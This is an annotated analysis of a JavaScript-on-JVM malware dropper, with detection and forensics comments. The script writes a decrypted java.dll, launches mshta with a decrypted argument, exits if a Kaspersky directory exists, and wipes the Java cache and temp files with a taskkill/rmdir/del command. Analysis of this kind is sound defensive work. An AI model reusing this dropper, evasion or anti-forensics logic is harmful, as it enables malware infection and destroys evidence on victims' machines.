// Analyst note: entry point of the script.
// Stores the "winver.version" system property (parsed as a float) in y and the "temp"
// environment variable in f, then calls a() to write a file to disk. If a() recorded a
// path in m, that path is passed to e() and the result is kept in h. Finally r() runs.
// Any exception thrown here is routed to l(), the cleanup-and-exit routine.
// NOTE(review): "winver.version" does not look like a standard JVM system property;
// presumably the hosting applet sets it. Confirm against the applet code.
- function main() {
- try {
- y = parseFloat(s.getProperty("winver.version")), f = s.getenv("temp"), a(), "" != m && (h = e(m)), r()
- } catch (t) {
- l()
- }
- }
// Analyst note: writes an embedded blob to disk as "java.dll" and records its path in m.
// The bytes come from t.gzrcb(t.rf(<resource>), applet.getParameter("adv")). The resource
// is "/d.dat" when v is truthy and "/com/d.dat" otherwise.
// NOTE(review): t.rf and t.gzrcb live in class com.t, which is not part of this listing.
// By name they look like "read resource" and "gunzip + decrypt with the adv key"; confirm.
// v and applet are also defined outside this listing.
// Detection: a Java process creating a file named java.dll under %ALLUSERSPROFILE% or the
// user's temp directory.
- function a() {
- try {
- if (v) var a = t.gzrcb(t.rf("/d.dat"), applet.getParameter("adv"));
- else var a = t.gzrcb(t.rf("/com/d.dat"), applet.getParameter("adv"));
- var e = null;
// First choice for the output file is %ALLUSERSPROFILE%\java.dll, created if missing.
- try {
- e = new File(s.getenv("allusersprofile"), "java.dll"), e.exists() || e.createNewFile()
- } catch (r) {
- e = null
- }
// Fall back to <temp>\java.dll (f is set in main) when the first location is unusable.
- null != e && e.canWrite() || (e = new File(f, "java.dll"));
- var l = new FileOutputStream(e);
- l.write(a, 0, a.length), l.close(), m = e.getAbsolutePath()
// Every failure is swallowed. m then stays "" and main() skips the call to e().
- } catch (r) {}
- }
// Analyst note: reflectively looks up the single-String constructor of payload's class,
// instantiates it with the path a (the file written by a()), and returns the new
// object's "success" field. Returns false if anything throws.
// NOTE(review): payload and its class are not in this listing. Presumably the constructor
// loads the dropped java.dll and "success" reports whether that worked; confirm.
- function e(a) {
- try {
- return payload.getClass().getConstructor(new Array(u)).newInstance(new Array(a)).success
- } catch (e) {
- return !1
- }
- }
// Analyst note: launches mshta with an argument recovered from the applet parameters,
// then always calls l() for cleanup and exit.
// The argument d is t.rc(t.h2b(applet.getParameter("session")), applet.getParameter("adv")).
// NOTE(review): t.h2b and t.rc are not in this listing. By name they look like a
// hex-to-bytes step followed by a cipher keyed with "adv"; confirm against class com.t.
// Detection: mshta started as a child of a Java process, either through the native
// payload object or through java.lang.ProcessBuilder.
- function r() {
- try {
- var a = applet.getParameter("adv"),
- e = !1;
// Preferred path: if the native payload loaded (h), ask it to run mshta with d.
// The block below is the fallback when there is no payload or execute() returned falsy.
- if (d = t.rc(t.h2b(applet.getParameter("session")), a), h && (e = payload.execute("mshta", d)), !h || !e) {
// Security-product check: n() is true when the directory exists and delete() fails, which
// is what File.delete() does for a non-empty directory. If a "Kaspersky Lab" data
// directory is found that way, the process exits without launching anything.
// y > 5.2 presumably separates Windows versions that have %ProgramData% from older ones.
- y > 5.2 ? n(new File(i("%programdata%"), "Kaspersky Lab")) && s.exit(0) : n(new File(i("%allusersprofile%"), "Application Data\\Kaspersky Lab")) && s.exit(0);
- var r = new p;
- r.add("mshta"), r.add(d), java.lang.ProcessBuilder(r).start()
- }
// Errors are swallowed. Cleanup runs whether or not the launch succeeded.
- } catch (c) {} finally {
- l()
- }
- }
// Analyst note: self-cleanup routine. It removes on-disk artifacts and always terminates
// the JVM via s.exit(0) in the finally block.
// The cache directory a comes from payload.getParameter("cache") when v is truthy (the
// literal string "null" is treated as empty), otherwise from the
// "deployment.user.cachedir" system property.
// The command line force-kills java.exe, runs "ping -n 3 127.1" (presumably as a short
// delay), recursively removes the cache directory, and deletes %tmp%\java2sw*,
// %tmp%\jar_cache*.tmp and %tmp%\update.log. The h branch also deletes the dropped file m.
// Forensics: the Java deployment cache and these temp files may already be gone on an
// affected host. Process-creation logs showing this taskkill/rmdir/del command line are
// the more durable evidence.
- function l() {
- try {
- var a = "";
- if (v ? (a = payload.getParameter("cache"), a.equals("null") && (a = "")) : a = s.getProperty("deployment.user.cachedir"), h) {
// Native payload available: hand the command string to payload.shellexec().
// NOTE(review): shellexec is not in this listing. The leading "/c" suggests it runs cmd.exe.
- var e = '/c taskkill /f /im java.exe & ping -n 3 127.1 & rmdir /q /s "' + a + '" & del /q /f "' + m + '" "%tmp%\\java2sw*" "%tmp%\\jar_cache*.tmp" "%tmp%\\update.log"';
- payload.shellexec(e)
- } else {
// No native payload: same "Kaspersky Lab" directory check as in r(), then run the
// cleanup through cmd.exe with ProcessBuilder. This variant does not delete m.
- y > 5.2 ? n(new File(i("%programdata%"), "Kaspersky Lab")) && s.exit(0) : n(new File(i("%allusersprofile%"), "Application Data\\Kaspersky Lab")) && s.exit(0);
- var t = new java.util.ArrayList;
- t.add("cmd.exe"), t.add('/c taskkill /f /im java.exe & ping -n 3 127.1 & rmdir /q /s "' + a + '" & del /q /f "%tmp%\\java2sw*" "%tmp%\\jar_cache*.tmp" "%tmp%\\update.log"'), java.lang.ProcessBuilder(t).start()
- }
- } catch (r) {} finally {
- s.exit(0)
- }
- }
// Analyst note: returns true only when a is non-null, exists on disk, and a.delete()
// returns false. Returns false otherwise, including on any exception.
// The callers pass a directory, so this reports "present and could not be removed".
// Side effect: if the delete succeeds, the path has actually been removed.
// The bracket form a["delete"] is used because "delete" is a JavaScript keyword.
- function n(a) {
- try {
- return null != a && a.exists() && !a["delete"]()
- } catch (e) {
- return !1
- }
- }
// Analyst note: expands the first %NAME% token in a using the process environment.
// Returns null for an empty string, an unterminated "%", an unset variable, or any
// exception. Returns a unchanged when it contains no "%".
// A single trailing backslash is stripped from the variable's value before substitution.
- function i(a) {
- try {
- if (0 == a.length) return null;
- var e = a.indexOf("%", 0);
- if (-1 == e) return a;
- var t = a.indexOf("%", e + 1);
- if (-1 == t) return null;
// r is the variable name between the two "%" marks. l is its value from System.getenv.
- var r = a.substring(e + 1, t),
- l = s.getenv(r);
- return null == l ? null : ("\\" == l[l.length - 1] && (l = l.substring(0, l.length - 1)), a.replace("%" + r + "%", l))
- } catch (n) {
- return null
- }
- }
// Analyst note: module-level setup. importPackage / importClass / Packages are Rhino
// (JavaScript-on-JVM) globals, so this script runs inside a Java process, not a browser
// JavaScript engine. Class com.t supplies the helper methods called as t.* elsewhere.
// Aliases: s = java.lang.System, p = java.util.ArrayList, u = java.lang.String.
// c, g and o are declared but not used by the functions in this listing.
// Shared state:
//   d = argument passed to mshta (set in r)
//   m = absolute path of the dropped java.dll (set in a)
//   y = parsed "winver.version" value (set in main)
//   f = value of the "temp" environment variable (set in main)
//   h = result of e(), i.e. whether the native payload reported success
- importPackage(java.io, java.net, java.util.zip), importClass(Packages.com.t);
- var s = java.lang.System,
- c = java.lang.reflect.Array.newInstance,
- p = java.util.ArrayList,
- u = java.lang.String,
- g = java.lang.Long,
- o = java.lang.Byte,
- d = "",
- m = "",
- y = 0,
- f = "",
- h = !1;